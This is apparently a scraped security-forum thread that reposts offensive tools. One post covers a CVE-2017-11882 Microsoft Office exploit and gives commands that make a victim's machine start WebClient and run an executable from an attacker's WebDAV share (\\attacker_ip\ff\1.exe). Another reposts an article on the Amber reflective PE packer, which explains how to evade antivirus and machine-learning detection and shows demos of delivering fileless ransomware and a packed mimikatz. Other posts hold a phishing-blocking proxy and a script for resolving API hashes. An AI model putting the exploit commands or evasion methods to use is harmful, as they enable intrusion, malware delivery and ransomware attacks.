    Source: https://github.com/bindecy/HugeDirtyCowPOC
  46. 1 point
    Microsoft Office - OLE Remote Code Execution Exploit
    CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/
    MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
    Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
    Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
    DEMO PoC exploitation:
    webdav_exec CVE-2017-11882
    A simple PoC for CVE-2017-11882. This exploit triggers the WebClient service to start and executes a remote file from an attacker-controlled WebDAV server. The reason this approach might be handy is the limit on the length of the executed command. With the help of WebDAV, however, it is possible to launch an arbitrary attacker-controlled executable on the vulnerable machine.
    This script creates a simple document with several OLE objects. These objects exploit CVE-2017-11882, which results in sequential command execution. The first command, which triggers the WebClient service start, may look like this:
        cmd.exe /c start \\attacker_ip\ff
    The attacker-controlled binary path should be a UNC network path:
        \\attacker_ip\ff\1.exe
    Usage
        webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
    Sample exploit for CVE-2017-11882 (starting calc.exe as payload)
    The example folder holds an .rtf file which exploits the CVE-2017-11882 vulnerability and runs the calculator on the system.
    Download: CVE-2017-11882-master.zip or git clone https://github.com/embedi/CVE-2017-11882.git
    Mirror: webdav_exec_CVE-2017-11882.py
    Source
  47. 1 point
    was that really necessary? :)))
  48. 1 point
    HouseProxy

Protect your parents from phishing: an HTTP proxy focused on blocking phishing URLs.

Install

git clone https://github.com/mthbernardes/HouseProxy.git
cd HouseProxy/
pip install -r requeriments.txt

Config

Edit etc/HouseProxy.conf to change the default user and password.
Create an entry in your DNS for house.proxy.

Usage

$ hug -f index.py
$ echo "127.0.0.1 house.proxy" | sudo tee -a /etc/hosts

Set house.proxy:3128 as your proxy.
Open the browser and access http://house.proxy:8000
Click on "update blacklists". It may take a while; the tool is downloading blacklists from PhishTank and OpenPhish.
Done, now just try to access a malicious URL.

Usage recommendation

Install it on a Raspberry Pi, create a network, force all HTTP traffic to pass through the Pi on port 3128 (transparent proxy), and connect the clients to this network.

Download: HouseProxy-master.zip
Source: github.com/mthbernardes/
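The decision such a proxy has to make before forwarding a request is whether the requested URL is on the downloaded blacklists. The script below is an added example of that check, not HouseProxy's own code: the feed entries are constructed sample data in the one-URL-per-line shape of the public feeds, and the policy of blocking a whole host (and its subdomains) only when the feed lists the site root is an assumption made here, chosen so that one phishing page on shared hosting does not block the entire host.

```python
from urllib.parse import urlsplit

# Constructed sample feed (not real PhishTank/OpenPhish entries): one URL per
# line, '#' comments and blank lines allowed, as the public feeds are shaped.
SAMPLE_FEED = """
# constructed example entries
http://login-secure-example.test/verify/index.php
https://EXAMPLE-BANK-UPDATE.test:443/account
http://paypa1-example.test/
"""

DEFAULT_PORTS = {"http": 80, "https": 443}


def url_key(url):
    """Reduce a URL to a (host, path) pair used for matching.

    The host is lowercased, a trailing dot and the scheme's default port are
    dropped; scheme, query string and fragment are ignored, because feeds
    list the same phishing page under many such variants.
    """
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").rstrip(".")
    try:
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        port = None
    if port and port != DEFAULT_PORTS.get(parts.scheme.lower()):
        host = "%s:%d" % (host, port)
    return host, (parts.path or "/")


def parse_feed(text):
    """Split a feed into exact (host, path) keys and whole-host entries.

    Only entries listed at the site root ("/") are treated as whole-host
    blocks (assumed policy, not HouseProxy's documented one); an entry with
    a deep path on shared hosting must not take the entire host down.
    """
    exact, hosts = set(), set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, path = url_key(line)
        if not host:
            continue
        exact.add((host, path))
        if path == "/":
            hosts.add(host.split(":")[0])
    return exact, hosts


class Blocklist:
    def __init__(self, feed_text):
        self.exact, self.hosts = parse_feed(feed_text)

    def is_blocked(self, url):
        """True if the URL matches a listed page exactly or sits on (or
        under) a host that is listed as a whole."""
        host, path = url_key(url)
        if (host, path) in self.exact:
            return True
        labels = host.split(":")[0].split(".")
        # Walk up the parent domains but never match a bare TLD.
        for i in range(len(labels) - 1):
            if ".".join(labels[i:]) in self.hosts:
                return True
        return False


if __name__ == "__main__":
    bl = Blocklist(SAMPLE_FEED)
    for req in ("http://login-secure-example.test/verify/index.php?id=1",
                "https://www.paypa1-example.test/login",
                "http://example.test/"):
        print("BLOCK" if bl.is_blocked(req) else "allow", req)
```

The normalization step matters more than the lookup itself: a feed entry with an upper-case host, an explicit :443 or a trailing query must still match the form the browser actually sends, otherwise the proxy silently lets the listed page through.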
  49. 1 point
    Introducing New Packing Method: First Reflective PE Packer Amber
October 24, 2017, Ege Balci. Categories: Operating System, Research, Tools

Because of the increasing security standards inside operating systems and rapid improvements in malware detection technologies, today's malware authors take advantage of the transparency offered by in-memory execution methods. In-memory execution, or fileless execution, of a PE file can be defined as executing a compiled PE file inside memory while manually performing the operations that the OS loader is supposed to do when executing the PE file normally. In-memory execution of malware facilitates obfuscation and anti-emulation techniques. Additionally, malware that uses such methods leaves fewer footprints on the system, since it does not have to possess a file on the hard drive. Combining in-memory execution methods and multi-stage infection models allows malware to infect systems with very small loader programs; the only purpose of a loader is loading and executing the actual malware code by connecting to a remote system. Small loader code is hard to detect by security products because the purpose and the code fragments of loaders are very common among legitimate applications. Malware that uses this approach can still be detected by scanning memory and inspecting the behavior of processes, but for security products these operations are harder to implement and costly because of the higher resource usage (Ramilli, 2010[1]). The current rising trend in malware detection technologies is to use machine learning mechanisms to automate the detection of malware by feeding very large datasets into the system; as in all machine learning applications, this mechanism gets smarter and more accurate over time by absorbing more malware samples. These mechanisms can feed large numbers of systems that human malware analysts can't scale to.
The Malware Detection Using Machine Learning[2] paper by Gavriluţ Dragoş from BitDefender Romania Labs explains in detail the inner workings of machine learning usage in malware detection. According to the Automatic Analysis of Malware Behavior using Machine Learning[3] paper by Konrad Rieck, with enough data and time false positive results will get close to zero percent, and deterministic detection of malware will be significantly effective on new and novel malware samples.

The main purpose of this work is developing a new packing methodology for PE files that can alter the way malware is delivered to systems. Instead of trying to find new anti-detection techniques that feed the machine learning datasets, delivering the payload to the systems via fileless code injection directly bypasses most of the security mechanisms. With this new packing method it is possible to convert compiled PE files into multi-stage infection payloads that can be used with common software vulnerabilities such as buffer overflows.

Known Methods

The following techniques are the inspiration point of our new packing method.

Reflective DLL Injection[4] is a great library injection technique developed by Stephen Fewer and it is the main inspiration point for developing this new packer, named Amber. This technique allows in-memory execution of a specially crafted DLL that is written with a reflective programming approach. Because of the adopted reflective programming approach, this technique allows multi-stage payload deployment. Besides the many advantages of this technique, it has a few limitations. The first limitation is the required file format: this technique expects the malware to be developed or recompiled as a DLL file, and unfortunately in most cases converting an already compiled EXE file to a DLL is not possible or requires extensive work on the binary. The second limitation is the need for relocation data.
The Reflective DLL injection technique requires the relocation data for adjusting the base address of the DLL inside memory. Also, this method has been around for a long time, which means up-to-date security products can easily detect the usage of Reflective DLL injection. Our new tool, Amber, will provide solutions for each of these limitations.

Process Hollowing[5] is another commonly known in-memory malware execution method that uses the documented Windows API functions for creating a new process and mapping an EXE file inside it. This method is popular among crypters and packers that are designed to decrease the detection rate of malware. But this method also has several drawbacks. Because of the Address Space Layout Randomization (ASLR) security measure inside up-to-date Windows operating systems, the address of the memory region when creating a new process is randomized; because of this, process hollowing also needs to implement image base relocation on up-to-date Windows systems. As mentioned earlier, base relocation requires relocation data inside PE files. Another drawback is that, because of the usage of specific file mapping and process creation API functions in a specific order, this method is easy to identify by security products.

Hyperion[6] is a crypter for PE files, developed and presented by Christian Ammann in 2012. It explains the theoretical aspects of runtime crypters and how to implement them. The PE parsing approach in assembly and the design perspective used while developing Hyperion helped us with our POC packer.

Technical Details of our new packing method: Amber

The fundamental principle of executing a compiled binary inside the OS memory is imitating the PE loader of the OS. On Windows, the PE loader does many important things; among them, mapping a file to memory and resolving the addresses of imported functions are the most important stages for executing an EXE file.
Current methods for executing EXE files in memory use specific Windows API functions for mimicking the Windows PE loader. The common approach is to create a new suspended process by calling the CreateProcess Windows API function and mapping the entire EXE image inside it with the help of the NtMapViewOfSection, MapViewOfFile and CreateFileMapping functions. Usage of such functions indicates suspicious behavior and increases the detection possibility of the malware. One of the key aspects while developing our packer is using as few API functions as possible. In order to avoid the usage of suspicious file mapping API functions, our packer uses premapped PE images; moreover, execution of the malware occurs inside the target process itself, without using the CreateProcess Windows API function. The malware executed inside the target process runs with the same process privileges because of the shared _TEB block, which contains the privilege information and configuration of a process.

Amber has 2 types of stub: one of them is designed for EXE files that support ASLR and the other one is for EXE files that are stripped or don't have any relocation data inside. The ASLR-supported stub uses a total of 4 Windows API calls and the other stub only uses 3, all of which are very commonly used by the majority of legitimate applications.

ASLR Supported Stub:
- VirtualAlloc
- CreateThread
- LoadLibraryA
- GetProcAddress

Non-ASLR Stub:
- VirtualProtect
- LoadLibraryA
- GetProcAddress

In order to call these APIs at runtime, Amber uses a publicly known EAT parsing technique that is used by Stephen Fewer's Reflective DLL injection[4] method. This technique simply locates the InMemoryOrderModuleList structure by navigating through the Process Environment Block (PEB) inside memory. After locating the structure it is possible to reach the export tables of all loaded DLLs by reading each _LDR_DATA_TABLE_ENTRY structure pointed to by the InMemoryOrderModuleList.
After reaching the export table of a loaded DLL, it compares the previously calculated ROR (rotate right) 13 hash of each exported function name until a match occurs. Amber's packing method also provides several alternative Windows API usage methods; one of them is using fixed API addresses, which is the best option if the user is familiar with the remote process that will host the Amber payload. Using fixed API addresses will directly bypass the latest OS-level exploit mitigations that inspect export address table calls; also, removing the API address finding code will reduce the overall payload size. Other alternative techniques can be used for locating the addresses of required functions, such as the IAT parsing technique used by Josh Pitts in the "Teaching Old Shellcode New Tricks"[7] presentation. The current version of the Amber packer only supports fixed API addresses and EAT parsing techniques, but IAT parsing will be added in the next versions.

Generating the Payload

For generating the actual Amber payload, the packer first creates a memory mapping image of the malware; the generated memory mapping file contains all sections, the optional PE header and null byte padding for unallocated memory space between sections. After obtaining the mapping of the malware, the packer checks the ASLR compatibility of the supplied EXE; if the EXE is ASLR compatible the packer adds the related Amber stub, if not it uses the stub for EXE files that have a fixed image base. From this point the Amber payload is complete. The image below describes the Amber payload inside the target process.

ASLR Stub Execution

Execution of the ASLR-supported stub consists of 5 phases:
- Base Allocation
- Resolving API Functions
- Base Relocation
- Placement Of File Mapping
- Execution

At the base allocation phase the stub allocates a read/write/execute privileged memory space the size of the mapped image of the malware by calling the VirtualAlloc Windows API function. This memory space will be the new base of the malware after the relocation process.
In the second phase the Amber stub will resolve the addresses of the functions that are imported by the malware and write the addresses to the import address table of the mapped image of the malware. The address resolution phase is very similar to the approach used by the PE loader of Windows. The Amber stub will parse the import table entries of the mapped malware image and load each DLL used by the malware by calling the LoadLibraryA Windows API function; each _IMAGE_IMPORT_DESCRIPTOR entry inside the import table contains a pointer to the name of the loaded DLL as a string, so the stub will take advantage of the existing strings and pass them as parameters to the LoadLibraryA function. After loading the required DLL, the Amber stub saves the DLL handle and starts finding the addresses of the imported functions from the loaded DLL with the help of the GetProcAddress Windows API function. The _IMAGE_IMPORT_DESCRIPTOR structure also contains a pointer to a structure called the import names table; this structure contains the names of the imported functions in the same order as the import address table (IAT). Before calling the GetProcAddress function the Amber stub passes the saved handle of the previously loaded DLL and the name of the imported function from the import name table structure. Each returned function address is written to the malware's import address table (IAT) with 4 padding bytes between them. This process continues until the end of the import table; after loading all required DLLs and resolving all the imported function addresses, the second phase is complete.

At the third phase the Amber stub will start the relocation process by adjusting the addresses according to the address returned by the VirtualAlloc call; this is almost the same approach used by the PE loader of Windows itself. The stub first calculates the delta value from the address returned by the VirtualAlloc call and the preferred base address of the malware; the delta value is added to every entry inside the relocation table.
In the fourth phase the Amber stub will place the file mapping into the previously allocated space; moving the mapped image is done with a simple assembly loop that does a byte-by-byte move operation. At the final phase the Amber stub will create a new thread starting from the entry point of the malware by calling the CreateThread API function. The reason for creating a new thread is to create a new growable stack for the malware; additionally, executing the malware inside a new thread will allow the target process to continue from its previous state. After creating the malware thread, the stub will restore execution by returning to the first caller, or the stub will jump into an infinite loop that will stall the current thread while the malware thread successfully runs.

Non-ASLR Stub Execution

Execution of the Non-ASLR stub consists of 4 phases:
- Base Allocation
- Resolving API functions
- Placement Of File Mapping
- Execution

If the malware is stripped or has no relocation data inside, there is no other way than placing it at its preferred base address. In such a condition the stub tries to change the memory access privileges of the target process by calling the VirtualProtect Windows API function, starting from the image base of the malware through the size of the mapped image. If this condition occurs, the preferred base address and target process sections may overlap, and the target process will not be able to continue after the execution of the Amber payload. The fixed Amber stub may not be able to change the access privileges of the specified memory region; this may have multiple reasons, such as the specified memory range not being inside the current process page boundaries (the reason is most probably ASLR) or the specified address overlapping with the stack guard regions inside memory.
This is the main limitation for Amber payloads: if the supplied malware doesn't have ASLR support (has no relocation data inside) and the stub can't change the memory access privileges of the target process, payload execution is not possible. In some situations the stub successfully changes the memory region privileges but the process crashes immediately; this is caused by multiple threads running inside the overwritten sections. If the target process owns multiple threads at the time of fixed stub execution, it may crash because of the changing memory privileges or the overwriting of a running section. However, these limitations don't matter if the fixed stub is not being used with a multi-stage infection payload; the current POC packer can adjust the image base of the generated EXE file and the location of the Amber payload accordingly. If the allocation attempt is successful, the first phase is complete. The second phase is identical to the approach used by the ASLR-supported stub. After finishing the resolution of the API addresses, the same assembly loop is used for placing the completed file mapping into the previously amended memory region. At the final phase the stub jumps to the entry point of the malware and starts execution without creating a new thread. Unfortunately, usage of the Non-ASLR Amber stub does not allow the target process to continue with its previous state.

Multi Stage Applications

Security measures that will be taken by operating systems in the near future will shrink the attack surface even more for malware. Microsoft announced Windows 10 S on May 2, 2017[8]; this operating system is basically a version of Windows 10 configured for more security, and one of the main precautions taken by this new operating system is that it doesn't allow installing applications other than those from the Windows Store. This kind of whitelisting approach adopted by operating systems will have a huge impact on malware that infects systems via executable files.
In such a scenario the usage of multi-stage in-memory execution payloads becomes one of the most effective attack vectors. Because of the position-independent nature of the Amber stubs, it allows multi-stage attack models; the current POC packer is able to generate a stage payload from a complex compiled PE file that can be loaded and executed directly from memory like a regular shellcode injection attack. In such overly restrictive systems the multi-stage compatibility of Amber allows exploitation of common memory-based software vulnerabilities such as stack- and heap-based buffer overflows. However, due to the limitations of the fixed Amber stub, it is suggested to use ASLR-supported EXE files while performing multi-stage infection attacks. Stage payloads generated by the POC packer are compatible with the small loader shellcodes and payloads generated from the Metasploit Framework[9]; this also means Amber payloads can be used with all the exploits inside the Metasploit Framework[9] that use the multi-stage meterpreter shellcodes.

Here is the source code of Amber. Feel free to fork and contribute..! https://github.com/EgeBalci/Amber

Demo 1 – Deploying EXE files through metasploit stagers

This video demonstrates how to deploy regular EXE files into systems using the stager payloads of Metasploit. The Stage.exe file generated from Metasploit fetches Amber's stage payload and executes it inside memory.

Demo 2 – Deploying fileless ransomware with Amber (3 different AV)

This video is a great example of a possible ransomware attack vector. Using Amber, a ransomware EXE file is packed and deployed to a remote system via a fileless PowerShell payload. This attack can also be replicated using any kind of buffer overflow vulnerability.
Detection Rate

The current detection rate (19.10.2017) of the POC packer is pretty satisfying, but since this is going to be a public project the current detection score will rise inevitably. When no extra parameters are passed (only the file name), the packer generates a multi-stage payload and performs a basic XOR cipher with a multi-byte random key, then compiles it into an EXE file, adding a few extra anti-detection functions. The generated EXE file executes the stage payload like regular shellcode after deciphering the payload and making the required environmental checks. This particular sample is the mimikatz.exe (sha256 – 9369b34df04a2795de083401dda4201a2da2784d1384a6ada2d773b3a81f8dad) file packed with a 12-byte XOR key (./amber mimikatz.exe -ks 12). The detection rate of the mimikatz.exe file before packing is 51/66 on VirusTotal. In this particular example the packer uses the default way to find the Windows API addresses, which is using the hash API; avoiding the usage of the hash API will decrease the detection rate. Currently the packer supports the usage of fixed addresses of IAT offsets; also, next versions will include IAT parser shellcodes for more alternative API address finding methods.

VirusTotal: https://www.virustotal.com/#/file/3330d02404c56c1793f19f5d18fd5865cadfc4bd015af2e38ed0671f5e737d8a/detection
VirusCheckmate Result: http://viruscheckmate.com/id/1ikb99sNVrOM
NoDistribute: https://nodistribute.com/result/image/7uMa96SNOY13rtmTpW5ckBqzAv.png

Future Work

This work introduces a new-generation malware packing methodology for PE files but does not support .NET executables; future work may include support for 64-bit PE files and .NET executables. Also, in terms of the stealthiness of this method there can be more advancement. Allocation of memory regions for the entire mapped image is done with read/write/execute privileges; after placing the mapped image, changing the memory region privileges according to the mapped image sections may decrease the detection rate.
Also, wiping the PE header after the address resolution phase can make detection harder for memory scanners. Development of the Amber POC packer will continue as an open source project.

References

[1] Ramilli, Marco, and Matt Bishop. “Multi-stage delivery of malware.” Malicious and Unwanted Software (MALWARE), 2010 5th International Conference on. IEEE, 2010.
[2] Gavriluţ, Dragoş, et al. “Malware detection using machine learning.” Computer Science and Information Technology, 2009. IMCSIT’09. International Multiconference on. IEEE, 2009.
[3] Rieck, Konrad, et al. “Automatic analysis of malware behavior using machine learning.” Journal of Computer Security 19.4 (2011): 639-668.
[4] Fewer, Stephen. “Reflective DLL injection.” Harmony Security, Version 1 (2008).
[5] Leitch, John. “Process hollowing.” (2013).
[6] Ammann, Christian. “Hyperion: Implementation of a PE-Crypter.” (2012).
[7] Pitts, Josh. “Teaching Old Shellcode New Tricks” https://recon.cx/2017/brussels/resources/slides/RECON-BRX-2017 Teaching_Old_Shellcode_New_Tricks.pdf (2017)
[8] https://news.microsoft.com/europe/2017/05/02/microsoft-empowers-students-and-teachers-with-windows-10-s-affordable-pcs-new-surface-laptop-and-more/
[9] Rapid7 Inc, Metasploit Framework https://www.metasploit.com
[10] Desimone, Joe. “Hunting In Memory” https://www.endgame.com/blog/technical-blog/hunting-memory (2017)
[11] Lyda, Robert, and James Hamrock. “Using entropy analysis to find encrypted and packed malware.” IEEE Security & Privacy 5.2 (2007).
[12] Nasi, Emeric. “PE Injection Explained Advanced memory code injection technique” Creative Commons Attribution-NonCommercial-NoDerivs 3.0 License (2014)
[13] Pietrek, Matt. “Peering Inside the PE: A Tour of the Win32 Portable Executable File Format” https://msdn.microsoft.com/en-us/library/ms809762.aspx (1994)

Source: https://pentest.blog/introducing-new-packing-method-first-reflective-pe-packer/
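The stubs described above never carry the names of the Windows APIs they resolve, only a ROR 13 hash of each export name compared against the export table walked from the PEB. For an analyst looking at a dumped stub, that means the 32-bit constants in it have to be mapped back to API names, which is what the following added example does; it is not Amber's or Reflective DLL Injection's code. The hash it recomputes is the function-name hash of Stephen Fewer's reflective loader (rotate the running value right by 13 and add each character); the list of names is the one the article gives for the two stubs, and the "observed" constants are constructed by hashing those names rather than taken from a real sample.

```python
MASK32 = 0xFFFFFFFF


def ror32(value, count):
    """Rotate a 32-bit value right by count bits (the x86 ROR instruction)."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & MASK32


def ror13_hash(name):
    """Hash a function name the way Fewer's reflective loader does:
    h = ror(h, 13) + c for every byte of the name, with no terminator."""
    h = 0
    for b in name.encode("ascii"):
        h = (ror32(h, 13) + b) & MASK32
    return h


# API names the article lists for Amber's two stubs. For real work, feed in
# the full export list of kernel32/ntdll instead of this short list.
STUB_APIS = [
    "VirtualAlloc", "VirtualProtect", "CreateThread",
    "LoadLibraryA", "GetProcAddress",
]


def build_reverse_table(names):
    """Map hash -> name so constants found in a dumped stub can be named."""
    return {ror13_hash(n): n for n in names}


def resolve_hashes(observed, table):
    """Return [(hash, name-or-None)] for each 32-bit constant observed."""
    return [(h, table.get(h)) for h in observed]


if __name__ == "__main__":
    table = build_reverse_table(STUB_APIS)
    # Constructed "observed" constants: three hashed stub APIs plus one value
    # that is not in the table, standing in for an unrecognised hash.
    observed = [ror13_hash("VirtualAlloc"), ror13_hash("LoadLibraryA"),
                ror13_hash("CreateThread"), 0xDEADBEEF]
    for h, name in resolve_hashes(observed, table):
        print("0x%08x -> %s" % (h, name or "unknown"))
```

As a sanity check, the value this produces for LoadLibraryA, 0xEC0E4E8E, is the LOADLIBRARYA_HASH constant in Fewer's ReflectiveLoader.h. Fewer's loader hashes module names separately, over their upper-cased UTF-16 form, and Metasploit's block_api adds the module and function hashes together; those variants are not implemented here, so a constant that fails to resolve may simply be a combined or module hash rather than an unknown API.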
  50. 1 point
    Greetings to our colleagues at SRI!